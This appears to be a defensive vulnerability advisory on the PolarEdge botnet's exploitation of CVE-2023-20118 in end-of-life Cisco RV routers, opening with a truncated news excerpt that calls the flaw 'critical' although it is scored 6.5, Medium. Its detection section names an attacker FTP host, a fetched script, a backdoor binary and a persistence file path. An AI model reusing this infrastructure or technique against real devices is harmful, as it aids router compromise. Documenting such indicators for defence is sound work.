Full Report
A new malware campaign has been observed targeting edge devices from Cisco, ASUS, QNAP, and Synology to rope them into a botnet named PolarEdge since at least the end of 2023. French cybersecurity company Sekoia said it observed the unknown threat actors leveraging CVE-2023-20118 (CVSS score: 6.5), a critical security flaw impacting Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and
Analysis Summary
# Vulnerability: Arbitrary Command Execution in Cisco Small Business Routers (PolarEdge Botnet Target)
## CVE Details
- CVE ID: CVE-2023-20118
- CVSS Score: 6.5 (Medium)
- CWE: (Not explicitly provided, likely CWE-78: OS Command Injection)
## Affected Systems
- Products: Cisco Small Business RV Series Routers
- Versions: RV016, RV042, RV042G, RV082, RV320, RV325
- Configurations: Devices running vulnerable firmware, particularly those with remote management enabled or accessible.
## Vulnerability Description
CVE-2023-20118 is a security flaw in specific models of Cisco Small Business RV series routers that allows for arbitrary command execution. Threat actors are actively exploiting this to compromise the devices and install the "PolarEdge" botnet implant, a TLS backdoor capable of executing remote commands.
## Exploitation
- Status: Exploited in the wild (Targeted by the PolarEdge botnet campaign since late 2023)
- Complexity: Likely Medium (Requires initial access facilitated by the vulnerability)
- Attack Vector: Network (Likely via management interfaces)
## Impact
- Confidentiality: High (Implied through command execution and data collection capabilities of the backdoor)
- Integrity: High (Arbitrary command execution allows full system compromise)
- Availability: Medium/High (Device compromised and repurposed for botnet activities)
## Remediation
### Patches
- **No Patches Available:** These routers have reached End-of-Life (EoL), and Cisco will not be releasing further security updates.
### Workarounds
- Disable remote management interfaces on the affected routers.
- Block external access (ingress traffic) to ports 443 and 60443 on the affected devices.
## Detection
- **Indicators of Compromise (IOCs):**
- Presence of shell scripts named "q" retrieved via FTP (potentially from 119.8.186[.]227).
- Execution of a binary named "cipher\_log".
- Persistence mechanism modifying `/etc/flash/etc/cipher.sh` to launch `cipher_log` repeatedly.
- Outbound TLS connections originating from the device to command-and-control servers.
- **Detection Methods and Tools:** Monitor system logs and network traffic for unusual FTP transfers and command execution attempts on these edge devices. Specialized IoT/network monitoring tools may be necessary to detect the TLS backdoor activity.
## References
- Vendor Advisory: hxxps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbr042-multi-vuln-ej76Pke5
- Threat Analysis: hxxps://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/